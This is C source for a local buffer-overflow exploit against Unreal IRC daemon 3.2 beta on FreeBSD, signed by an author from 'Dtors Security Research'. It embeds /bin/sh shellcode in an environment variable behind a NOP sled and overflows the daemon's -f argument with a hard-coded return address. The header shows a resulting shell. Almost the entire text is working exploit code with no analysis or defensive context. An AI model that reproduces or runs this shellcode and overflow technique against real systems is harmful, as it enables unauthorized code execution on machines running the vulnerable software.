Local exploit for Unreal IRC daemon 3.2.
e50479b8ae3686d516f7edd3b95bdd081d79cb14541fca5c08905c7229d76008
/* Unreal irc daemon 3.2 beta exploit code by Rave (FreeBSD)
* Dtors Just never stops pumping
* Rave@dtors.net
* Private !!!!!
* ---------------------------------------------------
* Dtors Security Research (DSR)
* Code by: Rave
* Mail: rave@dtors.net
* ---------------------------------------------------
* Shellcode located at: 0xbfbffdb4
* Ik got a litle something for you
* Its a Shell :-)
*
* sh-2.05$ id
* uid=500(Rave) gid=100(users) groups=100(users)
* sh-2.05$
*/
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#define ret 0xbfbffdb4
#define NOP 0x90
char shellcode []="\x31\xc0\x31\xdb\x31\xc9\x50\x53\x51\xb0\x7e\xcd\x80\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54"
"\x24\x08\x50\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd"
"\x80\xc9\xc3";
int blaat(){
char envbuff[500],*ptr;
int i;
for (i=0;i < 300-strlen(shellcode);i++)
envbuff[i]=NOP;
ptr=envbuff+300-strlen(shellcode);
for (i=0;i < strlen(shellcode);i++)
*(ptr++)=shellcode[i];
ptr =envbuff+300;
*ptr='\0' ;
setenv("Dsr",envbuff,1);
}
int main(){
char buffer[1025];
int i;
blaat();
memset(buffer,0x41,1024);
buffer[1021]=(ret&0x000000ff);
buffer[1022]=(ret&0x0000ff00) >> 8;
buffer[1023]=(ret&0x00ff0000) >> 16;
buffer[1024]=(ret&0xff000000) >> 24;
printf("\n---------------------------------------------------\n");
printf("Dtors Security Research (DSR) \n");
printf("Code by: Rave\n");
printf("Mail: rave@dtors.net\n");
printf("---------------------------------------------------\n");
printf("Shellcode located at: 0x%x\n",ret);
printf("Ik got a litle something for you\n");
printf("\t\t\t\t\tIts a Shell :-)\n");
execl("./ircd","ircd","-f",buffer,NULL);\
}